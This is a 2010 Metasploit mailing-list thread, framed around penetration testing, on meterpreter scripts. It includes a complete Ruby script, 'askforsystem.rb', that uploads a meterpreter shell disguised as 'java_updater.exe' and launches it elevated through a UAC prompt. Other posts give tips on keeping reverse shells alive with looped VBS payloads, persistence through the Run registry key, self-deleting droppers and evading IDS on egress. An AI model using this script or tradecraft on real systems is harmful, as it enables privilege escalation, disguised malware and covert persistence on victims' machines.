Re: uploadexec and kitrap0d

[Carlos Perez <carlos_perez () darkoperator com>]

Check the lib/scripts/meterpreter there is a mixing there with several new API calls and there is a check UAC one. I 
will write some documentation and post it today 

Sent from my iPhone

On Jul 12, 2010, at 1:08 PM, Rob Fuller <mubix () room362 com> wrote:

> Thats a pretty pimp script. Carlos? Some of the UAC checks would also be handy in other scripts as well.
>
> Nice work Devin!
>
> --
> Rob Fuller | Mubix 
> Room362.com | Hak5.org 
>
>
> On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch () gmail com> wrote:
>
> Kitrap0d never works in the wild, in my experience (too old now).  If you're into social engineering and the rules of 
> engagement permit it, I wrote a cheap hack called askforsystem.rb.  Essentially, copies over a couple files from the 
> "Elevate" Windows power tool, and a new shell.  It then executes the new shell with high IL privileges (which prompts 
> the user with UAC).  I chose the name java_updater.exe for the new shell.  It's cheap, but it works more often than 
> not.
>
> To use, copy all the files from the elevate power tool to your msf data directory (extract the archive first):
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
>
> Then copy a meterpreter shell executable named shell.exe into your msf data directory.  The name is hard-coded right 
> now.  Sorry.
>
> Then save the following script to your meterpreter scripts directory as askforsystem.rb:
>
> ----- cut -----
> ######################################################
> # AskForSystem:  Bypass UAC by, well, asking for it                #
> ######################################################
> session = client
> host,port = session.tunnel_peer.split(':')
>
> def uaccheck(session)
>     uac = false
>     winversion = session.sys.config.sysinfo
>     if winversion['OS']=~ /(Vista|7)/
>         if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
>             print_status("Checking if UAC is enabled ...")
>             key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
>             root_key, base_key = session.sys.registry.splitkey(key)
>             value = "EnableLUA"
>             open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
>             v = open_key.query_value(value)
>             if v.data == 1
>                 print_status("\tUAC is Enabled")
>                 uac = true
>             else
>                 print_status("\tUAC is Disabled")
>             end
>         end
>     end
>     return uac
> end
>
> def upload(session,file,fileontrgt)
>     location = session.fs.file.expand_path("%TEMP%")
>     fileontrgt = "#{location}\\" + fileontrgt
>     print_status("Uploading File #{file} ...")
>     session.fs.file.upload_file("#{fileontrgt}","#{file}")
>     print_status("Upload Complete ...")
>     return fileontrgt
> end
>
> def execute_as_system(session,file)
>     location = session.fs.file.expand_path("%TEMP%")
>     print_status("Running Commands ...")
>     session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}", nil,{'Hidden' => 
> true,'Channelized' => false})
> end
>
> if not uaccheck(session) then
>     print_status("UAC isn't running, don't bother...")
>     raise Rex::Script::Completed
> end
>
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell = File.join(Msf::Config.install_root, "data", "shell.exe")
>
> upload(session,elevatecmd,"elevate.cmd")
> upload(session,elevatevbs,"elevate.vbs")
> upload(session,shell,"java_updater.exe")
>
> sleep 1
>
> print_status("Executing shell as system...")
> execute_as_system(session,"java_updater.exe")
> ----cut----
>
> My ruby sucks, but you get the idea.  If someone wants to take the above script and add the appropriate railgun calls 
> to ShellExecuteEx with the runas verb, be my guest.  Also keep in mind that UAC isn't that big of an obstacle to Pen 
> Testing... you can still read all of the users data.  You can also still write to several directories in their 
> profile (AppData is shown as the target above).  You can also make meterpreter persistent by writing to the 
> HKCU\software\microsoft\windows\currentversion\run key.  But no hashes :(
>
> Invisible things lab blog has a great writeup of UAC here: 
> http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html
> Especially relevant is the criticism that it doesn't protect any user data, it just prevents machines from being 
> malware infested bots.
>
> Devin
>
>
>
>
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35 () yahoo com> wrote:
> Just tried it. Working like a charm now. Uploaded and executed without a problem.
> I should be the one thanking you for sharing so much of your knowledge. Your scripts rock and I have learned tons 
> from reading you over the years.
>
> I also noticed the kitrap0d script didn't work on the win 7 machine, probably all patched by now. I know that 
> getprivs has gone through some changes so what's the best script to run right off the bat when you have meterpreter 
> running as non-privileged user, before running scraper, hashdump and the like?
>
>
> cheers
> --- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote:
>
> From: Carlos Perez <carlos_perez () darkoperator com>
> Subject: Re: [framework] Meterpreter unexpectedly closes
> To: "Miguel Rios" <miguelrios35 () yahoo com>
> Cc: framework () spool metasploit com
> Date: Saturday, July 10, 2010, 1:45 PM
>
> svn up and give it a try now, it should be fixed. Thanks for reporting it
>
> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
>
> > Thanks Carlos.
> > Here's the output: running against a win 7 7600 build (english) machine.
> >
> > meterpreter > run uploadexec -e /root/notepad.exe
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -o /Q
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -v
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter >           
> >
> > --- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote:
> >
> > From: Carlos Perez <carlos_perez () darkoperator com>
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35 () yahoo com>
> > Cc: "Alex Polychronopoulos" <tweakier () gmail com>, framework () spool metasploit com
> > Date: Saturday, July 10, 2010, 12:49 PM
> >
> > Miguel 
> >
> > Do send me the output of what your getting and the command it self and I will take a look
> >
> > Cheers,
> > Carlos
> >
> > On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote
> > > Thanks. That explains it perfectly. For some reason I thought that meterpreter would continuously try to connect 
> > > back. Now I know I was wrong. I had tried the loop option with VBS but the problem is that my custom script is 
> > > designed to delete itself after running the meterpreter binary, so it obviously won't be there to respawn 
> > > meterpreter. A bit of a catch 22. 
> > >
> > > Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use the 'at' 
> > > and 'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set 
> > > up on the internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out 
> > > there on setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on 
> > > the server?).
> > >
> > > Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited 
> > > process dying since it's a standalone meterpreter binary I'm playing with.
> > >
> > > Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with 
> > > reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks.
> > >
> > > P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe 
> > > binary to %temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or 
> > > something like that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I 
> > > just want my binary to be silently executed but I must be missing something stupidly obvious. Time to sleep maybe.
> > >
> > > --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier () gmail com> wrote:
> > >
> > > From: Alex Polychronopoulos <tweakier () gmail com>
> > > Subject: Re: [framework] Meterpreter unexpectedly closes
> > > To: "Miguel Rios" <miguelrios35 () yahoo com>
> > > Cc: framework () spool metasploit com
> > > Date: Saturday, July 10, 2010, 8:28 AM
> > >
> > > Meterpreter is designed to not persistently trying to connect back to the handler, it tries once and then dies, so 
> > > you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the 
> > > payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs 
> > > file).
> > >
> > > On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35 () yahoo com> wrote:
> > > Hi list,
> > > I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine 
> > > when I test it in my XP SP3. I see the outbound connection and the process running, but after about a minute or so 
> > > the process dies if there's no listener configured on the receiving end and doesn't respawn.
> > > What am I doing wrong here? I must be missing something obvious. Is there a timeout option for this reverse shell 
> > > or a way to keep the process always running, even if it can't connect to the listener? Or is this due to 
> > > msfencoding the payload somehow breaks it? I have tested that it does work properly when the listener is waiting 
> > > for it, it's just the fact it timesout so quickly that is a pain.
> > >
> > > Also, saw the reverse_tcp allports payload and was wondering if there's a similar one for reverse meterpreter 
> > > https. Ideally one could configure default ports to try 1st and then keep trying randomly the other 65000 or so to 
> > > evade IDS. I know this would increase the payload size but it would be pretty stealth egress wise.
> > >
> > > Thanks. I do really love metasploit and the whole community behind it. You all rock.
> > >
> > > Miguel
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> > >
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework